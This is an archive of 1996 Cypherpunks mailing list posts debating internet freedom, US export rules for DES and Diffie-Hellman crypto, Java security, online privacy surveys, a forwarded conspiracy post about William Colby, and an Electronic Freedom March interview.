I'm sorry, but no.  If I come up to you in real life and hit you,
that's a real person doing a real thing to another real person.
Internet events are movement of information, and that is it.
Something that causes harm on the 'net only does so because that same
information would do so in real life, i.e. blackmail with the threats
issued by e-mail.  Mailing them IRL or slipping the note under the
door have the same effect, with the same response options: you ignore
it, you cave, or you call the police.  Same with death threats: you
can't kill someone over the net, you can only give them information
about you intentions.  When someone is actually IRL trying to kill you
that, as someone else mentioned, is the domain of the IRL police.

>  Freedom is under threat from two directions - from selfish individuals who
>  care little for the Community, and from the over zealousness of governments
>  who seek greater and greater control over individual thought and action.

Only the second one.  I have the freedom to read or not read any stuff
on the net.  If I'm being sent something I don't want to read, I can
usually figure this out within a line or two and delete it.  No one
individual can effect my net freedom (except my sysadmin, who can
revoke my account) using means that do not extend into RL.  Come to
think of it, even governments must extend their activities into RL to
enforce their internet restrictions, so they are not restricting the
'net per se, they are threatening real people with real things that
they will do to them if they do certain things on the internet.  This
is the equivalent of threatening to do something under law for any
other form of information dissemination (publishing slander, for
example). The real world is the real world, the net is the net, and
only in people's minds (and in the effects of computers themselves,
ie. turning on a sprinkler system) shall the twain meet.

>  *********************************************************
>  Colin Gabriel Hatcher - CyberAngels Director
>  angels@wavenet.com
>  
>  "Two people may disagree, but
>  that does not mean that one of them is evil"
>  
>  *********************************************************

<FLAME OFF>

Good argument style, BTW.  I just disagree with some of your founding
assumptions. 

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 2 May 1996 12:22:11 +0800
To: peng-chiew low <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
Message-ID: <199605011919.MAA27020@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 AM 5/2/96 +0700, peng-chiew low wrote:
>Daniel R. Oelke wrote:
>> There are provisions for exporting DES for banking purposes.
>> Generally it is a hardware card that "can't" be reused outside
>> of the banking transfer machine. 
>
>So far, I've seen DES software from a couple of U.S. companies. The question
>is "Is it the U.S. domestic DES or "export flavored" DES? As for the hardware,
>would'nt it be inconsistant if the DES supplied is the Domestic DES?

As far as I know, DES is DES, domestic or export.  If your DES
interoperates with domestic DES (or popular implementations available on
non-US servers), then you have DES.


>I know DES as a subject here is one big YAWN, but for guys like us in the
>Asia, it's not. Why? 'Cause the US crypto companies here in Asia keep telling 
>us about how good and wonderful and secure DES is, and that it is THE standard
>used by the American Banking Association. 

It is THE standard.  The political reasons are complex, but the bottom line
is that large governments and other large organizations can brute force 56
bit keys.  As far as the US government and the US banking system are
concerned, this ability does not reduce bank transaction security since the
US government can get the details directly from the bank by legal process.

Most cryptographic experts recommend Triple DES, encrypting the data 3
times with 3 different keys.  If the middle encryption runs DES in decrypt
mode, the system can be made compatible with single DES by using the same
key 3 times.  The US government has never, to my knowledge, licensed the
export of a Triple DES system.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 2 May 1996 14:30:53 +0800
To: tcmay@got.net
Subject: Re: The Joy of Java
In-Reply-To: <ada79e9200021004908e@[205.199.118.202]>
Message-ID: <Os7hx8m9L8GB085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ada79e9200021004908e@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:

> I think of it (and so do a lot of others) as:

[snip]

> - a bytecode/virtual machine approach that means the same code can be run
> on any platform for which a VM exists (the key to applets, but also the key
> to portability...what the world might have looked like for the past 15
> years has the UCSD p-system succeeded instead of MS-DOS)

What a horrifying thought!  UCSD p-system actually made MS-DOS look good.

And you're *advocating* Java?

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMYe70+VevBgtmhnpAQHqSwL/fUn6cf7YD8fZygWqEt6EY6jBA3++oPK4
j03Q2oMundOrbNZhyyb5dLwpANIfBcf+iw+s20LephsTmIaM7Y161pmgNpeNbvs6
mPVTftkDZ2su3FevG2j1nEH7J0Umlbx4
=XEHR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 2 May 1996 13:04:21 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605010033.UAA15101@jekyll.piermont.com>
Message-ID: <199605011937.MAA22988@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



PM:
>> well, are you saying it would be impossible to do such a thing
>> [produce a safe execution environment] in a distributed programming
>> language?
>
>It is difficult. The way Java does this, with the protection relying
>solely on the correctness of the runtime (the interpreter isn't
>emasculated so flaws in the runtime can cause unexpected behavior) it
>is nearly impossible. Humans aren't good enough at designing systems
>this century.

I agree that designers should start from the assumption that their
software will have bugs, not the converse (in fact have been having
a long running argument with an academic on this list on this subject,
he claims that RCS will not be necessary with good OO programming
because OO programming gets rid of virtually all bugs that require
re-releases). however, again my main point is that the assumptions
Java makes are suitable for its environment. you can't realistically
make demands on the language it was not meant to support.

>The Web is the universal marketplace these days. Being unable to use
>the web is the equivalent of being unable to use the phone.

of course others will call you on this. and ideally a future infrastructure
for your country would not have the insecurity the internet does.
everyone is slowly working toward this goal. but it is an incremental
process. Java is an inherent part of that incremental process. no
one today can take java and say, "at last!! the net is secure!!". 
anyone who does this I agree is misguided.

> I have
>research analysts at large trading houses begging for
>Netscape. Unfortunately, these people have a need for top notch
>security, because vast amounts of money are at stake.

yes, I know that there are banks that don't understand that when
something is "secure", it still may not be sufficient for their needs,
which may require a whole higher order of security not available.
but any consultant worth his salt such as yourself will be able to
make a good judgement about the software and hardware they plug
in and guide the client. the point is that no one who wrote Java
is misleading the public, as you sometimes seem to imply.

however there are ways to use Netscape and java that make the
insecurity of the internet irrelevant. suppose that you put Java
inside an intranet inside a company. you already have a degree
of trust over employees. if you can demonstrate that your intranet
does not make any additional trust requirements than those you
already rely on, then sure, go ahead and use Netscape and Java in
an intranet, a semi-secure environment.

>So, yes, if you are going to create a product that everyone on earth
>has to be able to use, it had damn well not explode in your face every
>once in a while. Imagine if all the world's refrigerators had a 1 in
>10,000 chance of blowing up on you. "Whats the harm" you say. Well,
>most people don't expect that sort of behavior in a friendly consumer
>appliance that nice people from Sun and Netscape guarantee is
>absolutely positively safe except for all the bugs.

people will always put products to use in ways they were not designed.
the designers can try to anticipate this as much as possible but should
not be responsible for it ultimately.

>As I said, the traders don't expect that their phone will explode when
>they pick it up, or that every piece of literature they get in the
>mail may be coated with contact poison. Well, Java is a silent
>killer. It soon is going to be sitting on every desktop at every
>company in America and its being sold as the new paper or phone. Its
>also sitting on all those PCs running "Quicken" that helpfully now can
>do direct electronic funds transfer from your account, etc. If you
>don't care about the security of your bank account, well, sure, you
>have nothing to worry about.

I trust that those who implement bank security, such as yourself, will
not use a widget where a gadget is actually called for. really, humanity
is not *totally* stupid. there are two classes of people for our purposes:
those that build the systems, and those that use them. stupidity on the
part of the latter is not a problem if you have good designers; their
mistakes are protected against and are not made fatal. 

stupidity on the part of the former-- well, what can you possibly do
to avoid ramifications of bad design? it seems to me if your designers
are bad, you can't rely on anything whatsoever. a good designer is
not going to use Java in an inappropriate environment. are you complaining
that "there are a lot of bonehead designers that create bad systems"?
agreed, but what can Java do about it? a tool cannot necessarily 
prevent its own misuse. in fact Java goes to great lengths to avoid
the problems that arise in regular programming languages, such as
memory leaks.

>In short, my clients need security today. Your home computer probably
>needs it soon if not now, and if you think your business can survive a
>few days without its computers, please, by all means, run without
>security.

but Java did not claim to be your savior for security. maybe someone
will augment it to the point that you are happy. in the meantime why
are you criticizing it for being unable to handle something it was not
designed to handle?

>Its not Java crashing that I worry about. Its everything else on the
>computer and the network it is attached to that needs protection.

I see. so Java designers need to solve every security problem on the
planet for you not to criticize that language. look, security problems
exist and are all over the place, I agree. the internet is insecure.
people rely on this insecurity. but again, why are you ranting at
Java designers for all these other problems? Java is a step in the
right direction. it is a new attitude change. when we do have secure
networks in the future, I think people will look back on Java as
a milestone, not a trip-up.

>Well, sorry, you try to keep it off the desks in the banking industry
>if you can.

again, if a bonehead designer uses something in the way it was not
intended, are you going to blame the person who made the hammer?

>Life critical applications or important financial applications are all
>around us. You just don't seem to notice.

I agree they are all around us. but again, why are you ranting at Java
because you don't have tools to make your job a piece of cake? that's
what a good designer does-- takes pieces that in themselves may insufficient
to accomplish his job, and puts them together in a way that they do.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 2 May 1996 12:34:59 +0800
To: cypherpunks@toad.com
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
Message-ID: <199605012014.NAA05957@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 AM 5/1/96 +0700, peng-chiew low <pclow@pc.jaring.my> wrote:
>I understand that ITAR prohibits the export of strong crypto
>and that is why I was puzzled that Ms Glenda Barnes, the Director
>of Marketing in Cylink, said that Cylink could export the same crypto
>(i.e. DES) that was used in the U.S. to local banks here in Malaysia.

The International Trafficking in Arms Regulations laws that prohibit
export of strong crypto make exceptions for equipment/software
to be used in banks and other financial institutions, as long as
the banks behave themselves.  Exporting for general use is different.

>She also claimed that Cylink could also export a 128-bit DH key size.
>(is it strong enough in the first place? )

Sun's original "Secure NFS" used 192-bit DH keys, and was cracked by
Brian LaMacchia and Andy Odlyzko; there's a well-known paper about
this available somewhere (I think research.att.com?).  192 is way too short.
512 is probably too short.  128 bits is amazingly irresponsible.
The attack they use spends most of its time precomputing information about
the modulus and generator, and only a small part of the time attacking the
specific exponent that was used - this means that an attacker who cracks one
exponent using that modulus can easily crack the any others.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 2 May 1996 10:04:18 +0800
To: peng-chiew low <pclow@pc.jaring.my>
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <31879DD8.3479@pc.jaring.my>
Message-ID: <199605011713.NAA17782@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


It is legal to export full DES, in binary form, to banks outside the
US.  In other words, a company in the US can create a financial
package that uses DES, even for encryption, and sell it to a bank
outside the US.  THe caveat is that DES can only be used to encrypt
the financial transactions, not arbitrary data.

I hope this helps.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@azstarnet.com
Date: Thu, 2 May 1996 12:23:26 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom and security
Message-ID: <199605012031.NAA00283@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Re: Colin Gabriel Hatcher - CyberAngels Director

On the Internet, no one knows if you're wearing your CyberAngels beanie.

(With apologies to _The New Yorker_).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Olmur <olmur@dwarf.bb.bawue.de>
Date: Thu, 2 May 1996 12:07:23 +0800
To: peng-chiew low <pclow@pc.jaring.my>
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <3186D86C.49C@pc.jaring.my>
Message-ID: <199605011200.OAA02248@dwarf.bb.bawue.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "p-c l" == peng-chiew low <pclow@pc.jaring.my> writes:

p-c l> Dear Wei Dai I understand that ITAR prohibits the export of
p-c l> strong crypto and that is why I was puzzled that Ms Glenda
p-c l> Barnes, the Director of Marketing in Cylink, said that Cylink
p-c l> could export the same crypto (i.e. DES) that was used in the
p-c l> U.S. to local banks here in Malaysia.

I'd assume that the magic word here is "banks".  It's usually no
problem to export strong crypto from US, if it's used only for banking
purposes.  IBM delivers SmartCards with full Triple-DES to
bank-customers in Germany: absolutely no problem.


My personal oppinion is, that banks
a) don't encrypt arbitrary data, but only specific accounting data
b) banks can be quite easily house-searched, if you really want to get
   a hold on their data


Have a nice day,

Olmur
- --
"If privacy is outlawed, only outlaws will have privacy" --- P. Zimmermann
      Please encipher your mail!  Contact me, if you need assistance.

finger -l mdeindl@eisbaer.bb.bawue.de for PGP-key
         Key-fingerprint: 51 EC A5 D2 13 93 8F 91  CB F7 6C C4 F8 B5 B6 7C




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMYdSOQ9NARnYm1I1AQGU3AP9GNkYG6egzW4W640SLqaoYsWnIYyrt1rH
QQ6qvoEhc1OPTAlexJkIakaazG/BmWmZcWpLq8otQV5Cd9R4VGBKoPhBJcrfqGmQ
aK5qTDjgY4uSUTLZy3oxNYDn0SXyut3zUpds/EFU+qLr9gOwQMwX2adY7WQWApHV
CHacD7Z5EEo=
=8k4G
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 2 May 1996 12:39:07 +0800
To: cypherpunks@toad.com
Subject: Sun's Wallet
Message-ID: <199605012116.OAA09307@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Sydney, Australia, April 30 -- SunSoft will shortly
release a workable cash-on-the-Internet program called
Wallet, according to James Gosling, Sun vice president,
lead engineer and key architect behind the Java
cross-platform language.

Gosling, on his first visit to Australia, was discussing
the future of electronic commerce at a briefing session
in Sydney for Australian information technology
journalists.

-----

San Jose, Calif., April 30 -- VeriSign, a provider of
digital authentication services for Internet access and 
electronic commerce, has announced the opening of its
online Digital ID Center. VeriSign claims the center is
capable of issuing millions of personal Digital IDs for
World Wide Web and Internet e-mail users. 

Digital IDs use cryptographic techniques to provide a
means of authenticating the identity of each party in an
electronic transaction. A Digital ID is issued by
VeriSign, after background checks are made on an
individual or "entity." Once issued, the Digital ID can
be used within any enabled application such as Netscape
Navigator Internet client software and Netscape
SuiteSpot.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 2 May 1996 12:44:11 +0800
To: cypherpunks@toad.com
Subject: A survey on online privacy to skew[er] (WhoWhere?)
Message-ID: <Pine.GUL.3.93.960501143905.8180B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


http://www.whowhere.com/survey.html

The "Stanford" in the title is obviously just a typo.  Be aware that
they've been known to aggressively finger, etc. sites that contact their
site. 

I especially like this question, which I swear I am not making up: 

30. Search by Affiliation - for example "Working Women", "Lawyers", "Gay
    and Lesbian", "Hispanics", etc. [Must add] [Nice to add] [Don't care]

WhoWhere originally built their database by writing a script to
aggressively extract email addresses from the web server of OKRA, a
research computer at UC Riverside that had been culling addresses from
Usenet and other sources, making them freely available to the Internet
community. Two wrongs don't make a right, of course. OKRA has since taken
steps to ensure that noone else can extract mass quantities of addresses
in the same way. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 2 May 1996 10:44:31 +0800
To: Steven Weller <stevenw@best.com>
Subject: Re: Freedom and security
In-Reply-To: <v01540b00adad237d5dd2@[206.86.1.35]>
Message-ID: <Pine.SUN.3.93.960501152558.614n-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 May 1996, Steven Weller wrote:

> >Jim Ray wrote
> 
> I haven't bothered reading this particular thread up until now, but in my
> opinion, based on this drivel, you're getting dangerously close to being
> certified officially by the Cabal as an ignorant kook.
> 
> >Nor does freedom increase through less laws or no laws.
> 
> Of course it does. However, to maintain community resposibility must also
> increase.


Watch your attributation, Jim Ray did not write this.


[...]

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 2 May 1996 13:32:32 +0800
To: cypherpunks@toad.com
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <199605011919.MAA27020@netcom8.netcom.com>
Message-ID: <199605012312.QAA11109@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:

 > Most cryptographic experts recommend Triple DES, encrypting
 > the data 3 times with 3 different keys.

It's actually encrypted three times with two keys comprising
112 bits of keyspace, using a decrypt on one key sandwiched
between two encrypts using the other.  This prevents a "man
in the middle" attack, which would be possible if only two
DES encryptions were used, one for each key.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 2 May 1996 12:29:13 +0800
To: cypherpunks@toad.com
Subject: THR_ill
Message-ID: <199605012026.QAA00857@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-1-96 FiTi has an 18-page insert on information
   technology. Its Page One thriller:

   "Businesses fail to halt 'Ram raiders.'

      A sprialling crime wave is causing growing concern among
      law enforcement authorities, insurers and the business
      community. Computer theft is the fastest-growing crime
      in the UK. To combat physical computer crime, a wide
      variety of protection measures have been developed:
      physical restraints, motion detectors, electronic
      tagging, dye sprays, invisible identity tags, microdots,
      smoke bombs, chemical "fingerprints," and software
      monitors. Beyond the threats of hacking and virus
      attacks, as much as 2bn pounds a year is lost by
      computer misuse and "time-wasting surfing the Internet".

      Some of the new-anti-theft products are on display at
      Infosec 96, the UK's first big IT security exhibition,
      at London Olympia this week. The organisers have
      prepared seven fact sheets dealing with security "hot
      topics" such as encryption, disaster recovery and virus
      protection.

   THR_ill

   -----

   Any London cpunk care to post the seven fact sheets, or
   send (e-mail or fax) here for show 'boting?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 2 May 1996 11:55:56 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: Freedom and security
Message-ID: <199605012049.QAA07204@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Steven Weller wrote:

>>Jim Ray wrote
>
>I haven't bothered reading this particular thread up until now, but in my
>opinion, based on this drivel, you're getting dangerously close to being
>certified officially by the Cabal as an ignorant kook.
>
>>Nor does freedom increase through less laws or no laws.

[...]

Er...I agree with just about all of Mr Weller's comments, but I wish
he had been a bit more careful in the attribution department.
"Colin Gabriel Hatcher - CyberAngels Director" wrote: "Nor does
freedom increase through less laws or no laws." etc. etc. etc.,
not me. As a partisan Libertarian, I have a reputation to uphold
as an officially designated, Cabal-annoying, ignorant kook. :)
I'm even in Perry's killfile filter. I actually try to lurk,
rather than posting here very frequently, as my thoughts are
more relevant to the political ramifications of strong crypto
than they are to the implementation of strong crypto.
JMR

Regards, Jim Ray <liberty@gate.net> 

"My cynical belief is that there is a lack of motivation in either
 party to fully and properly investigate [Mena] because the results
 will damage as many Republicans as Democrats." - former prosecutor
 Charles Black, in April 22, 1996's Wall Street Journal p.A22
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35   --   http://www.shopmiami.com/prs/jimray
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMYfNiW1lp8bpvW01AQH2CQP+MUwSl9tHZNCiU2m6wTmsbByjDI1kZQTJ
v7vKoAc2txNkwBofLCxbxqdPSSYVIDO2x87t2+bn/OcxqMrtIDxi9UpNVYMD7VLM
LGi6fgZW3dFPaVEzc2WwXgcZ9Py9sSqaI0giBxyMhUiLko8UmtPW5BYBIWxgXJHm
D4ExhNVoCZ0=
=QXnq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 2 May 1996 14:37:02 +0800
To: cypherpunks@toad.com
Subject: Fire and Forget
Message-ID: <adad3fc20f02100421b9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:26 PM 5/1/96, Black Unicorn wrote:
>On Wed, 1 May 1996, Steven Weller wrote:
>
>> >Jim Ray wrote
>>
>> I haven't bothered reading this particular thread up until now, but in my
>> opinion, based on this drivel, you're getting dangerously close to being
>> certified officially by the Cabal as an ignorant kook.
>>
>> >Nor does freedom increase through less laws or no laws.
>>
>> Of course it does. However, to maintain community resposibility must also
>> increase.
>
>
>Watch your attributation, Jim Ray did not write this.

What!!!!

Now you tell me, after I spent all that money on a "fire and forget" contract!

Well, Jim, all I can say is keep your head down. Sorry!

(Seriously, I knew the "Jim Ray wrote" must've been a misattribution, as
that is not the kind of stuff Jim writes.)

(Oh, and the "fire and forget" contract assassins were well-described by
William Gibson in, I believe, "Count Zero.")

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 2 May 1996 14:15:25 +0800
To: Black Unicorn <liberty@gate.net>
Subject: Re: Freedom and security
Message-ID: <v01540b00adadadb5278f@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>> >Jim Ray wrote
>>
>> I haven't bothered reading this particular thread up until now, but in my
>> opinion, based on this drivel, you're getting dangerously close to being
>> certified officially by the Cabal as an ignorant kook.
>>
>> >Nor does freedom increase through less laws or no laws.
>>
>> Of course it does. However, to maintain community resposibility must also
>> increase.
>
>
>Watch your attributation, Jim Ray did not write this.

You're right. I didn't think he did when I wrote my reply. And I don't now.
It was a case of hasty editing without rereading. Apologies to Jim Ray.

Should have been:

Colin Gabriel Hatcher - CyberAngels Director, net kook.



-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 2 May 1996 14:49:22 +0800
To: cypherpunks@toad.com
Subject: Burns bill?
Message-ID: <m0uEn9H-00091VC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


It has been over a month since we first heard that Burns was going to 
introduce a bill to free up encryption software exports.  It isn't here, 
yet, as you may have noticed.  However, I don't think that's the real 
problem.  The real problem is that we have seen essentially no information 
on it, and we (by we, I mean the entire Internet community) have not had an 
opportunity to study it and comment BEFORE it is introduced in Congress.

See, the usual practice of introducing it in Congress first and only then 
letting the public see the bill is, by my way of thinking, an example of 
extreme rudeness on the part of the politicians.  Bills are far easier to 
change before they've been officially filed, which I suppose is the point.  
We're not getting the opportunity to fix minor mistakes, or at least make 
Burns (or any other supporter) aware of them.  This is a glaring "take it or 
leave it" philosophy, one that we should reject.  Does he really intend to 
insult us? 

I see no reason to believe that Burns should be able to produce an adequate 
bill with the assistance of only industry lobbyists, but not the help of 
other citizens of varying degrees of expertise.  Burns should immediately 
release the text of the bill developed up until now, and then wait at least 
a few weeks before introducing it formally, after changes are proposed, 
considered, and accepted.

Jim Bell
jimbell@pacifier.com


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Thu, 2 May 1996 15:00:21 +0800
To: bryce@digicash.com
Subject: Re: If the Net were an industrial city... (nee: Freedom and security)
Message-ID: <199605020135.SAA12288@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:11 PM 5/1/96 +0200, you wrote:
>

>> >It's now a major industrial city and will
>> 
>> It's industry being?
>

>It's a service industry.  An information service industry.  
>Journalists, phone-sex whores, business consultants, 
>bankers, brokers and barkers are moving into town, setting 
>up their virtual shops, and catering to the hordes of 
>readers, sightseers, sex-seekers, game-players, businessmen,
>professionals and amateurs of all stripes that are pouring 
>into town in wave after wave.

Its also a college town.  And a publishing center.  Then there's 
the warehouse district, and the post office.  There's also a thriving 
import-export business.  No wonder the political big-shots back in 
Atomland wish they could annex Cyberspace.  I predict that these 
attempts will succeed about as well as the European colonization of 
the Americas.  (ambiguity intended)

>Granted most of these virtual shops consist of a single
>ticket-taker's booth and a 10-meter tall neon facade.  

That's how boom-towns start, allright.

>Granted that the shops occasionally collapse on visitors,

Yes.

>that there are no streets, 

We have streets all over the place.  From here theres a 56Kb 
lane road that's even fairly well paved.  But they mostly 
lead to "Atomland expatriot hobbyists" and a few service 
subsistance farms.

>that you can't tell the sellers from the buyers 

It always starts with a barter economy.

>... few people are able to accept cash.

It will be a while, but someday folks will say:
"Save your greenbacks, Atomland will rise again!"
and they will be wrong.

>Still, it's a service industry.

Coming soon.... Virtual Food!  Okay, maybe I got 
a little carried away....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alanh@widomaker.com (Alan Horowitz)
Date: Thu, 2 May 1996 13:37:03 +0800
To: cypherpunks@toad.com
Subject: "Colby was my FRIEND how dare you say he wasn't just a nice old guy"
Message-ID: <m0uElGf-0000I4C@widomaker.com>
MIME-Version: 1.0
Content-Type: text/plain



>Path: news.widomaker.com!Grouper.Exis.Net!news.cais.net!newsfeed.internetmci.com!in2.uu.net!news.accessone.com!not-for-mail
>From: rivero@accessone.com (Michael Rivero)
>Newsgroups: alt.conspiracy,alt.current-events.clinton.whitewater,alt.journalism
>Subject: Re: CIA DIRECTOR KILLED BY U.S. GOVERNMENT
>Date: 1 May 1996 10:46:05 -0700
>Organization: Accessone
>Lines: 32
>Message-ID: <4m880t$ecf@pulm1.accessone.com>
>References: <4m2i4o$eou@tribune.concentric.net> <Dqn829.Dtp@iglou.com> <3185b042.26181571@news.i-d.com> <4m5jme$1gqo@mule2.mindspring.com>
>NNTP-Posting-Host: pulm1.accessone.com
>Xref: news.widomaker.com alt.conspiracy:121455 alt.current-events.clinton.whitewater:42258 alt.journalism:40308

In article <4m5jme$1gqo@mule2.mindspring.com>,
Charles Held <cheld@mindspring.com> wrote:
>In article <3185b042.26181571@news.i-d.com>, sdgrant@i-d.com (Steven Grant) wrote:
>
>=Of course, there are peculiarities about the Colby disappearance: he
>=left dirty dishes in the sink, his radio and computer were still on,
>
>Also his dinner was on the table.
>

  And the door was unlocked. One thing about spooks. They love locks.
I mean, they REALLY love locks.

  Let's see if I have this streight.

  Colby got up from a working dinner, left the computer on, walked out
the door without locking it, got into his canoe without wearing his usual
life jacket and vanished from the middle of a placid stream.

  That about it?




  You know, maybe just having him vanish WASN'T the best way to deal with
internet questions after all.


-- 
PIXELODEON PRODUCTIONS | Hand Hammered Special Effects
Mike & Claire - The Rancho Runnamukka http://www.accessone.com/~rivero 
Will Host A Talk Radio Show For Food.                                       




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Thu, 2 May 1996 16:43:13 +0800
To: cypherpunks@toad.com
Subject: CFA: a million geeks?
Message-ID: <2.2.32.19960502025511.0069b388@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


This is an interview I did with Keith Glass about the
changes with the Electronic Freedom March.  He mentions
making crypto an issue there.


Rich


-----BEGIN PGP SIGNED MESSAGE-----

    [This is an article from the may96 issue of the web zine
    _cause for alarm_, http://www.teleport.com/~richieb/cause.
    It may be redistributed electronically with this header
    included.]
           

    I contacted Keith Glass about an interview shortly after
    finding out that he had taken over as head of the
    Electronic Freedom March. The March, an attempt to
    influence Washington with a critical mass of geeks, was
    originally scheduled for June. In his response to my
    email, Keith said that the March was being rescheduled
    for late September and that he would make a public
    announcement soon. His subsequent press release said
    that, "With the current state of the case against the
    CDA, ACLU vs. Reno, and several organizational factors,
    it's been concluded that it would be far more effective
    to focus the political power of the citizens of the Net
    closer to the November elections." Keith joined me at
    Club Wired, after a hard day at work.


    ---


    CFA: Thanks for coming, Keith :)

    Keith G: And thus ends another thrilling day, standing
    for Truth, Justice, and/or the American Way <g>

    CFA: Heh.

    Keith G: Hey, a day at the Pentagon is like... a day in
    hell, only the cooking is worse.

    CFA: What do you do there BTW? If it's not classified? ;)

    Keith G: Nope: I work Pollution Preventions and
    Standardization issues for the Secretary of the Air
    Force. I'm a contractor, better known as one of the
    legendary "Beltway Bandits", although **I** prefer the
    term "Parkway Patriot"...;-)

    CFA: :) So, let's talk about the March. The new date is
    Sept. 29, tentatively?

    Keith G: Tentatively. I'm checking with the Park Service
    and the Majority Leaders' office in the next few days,
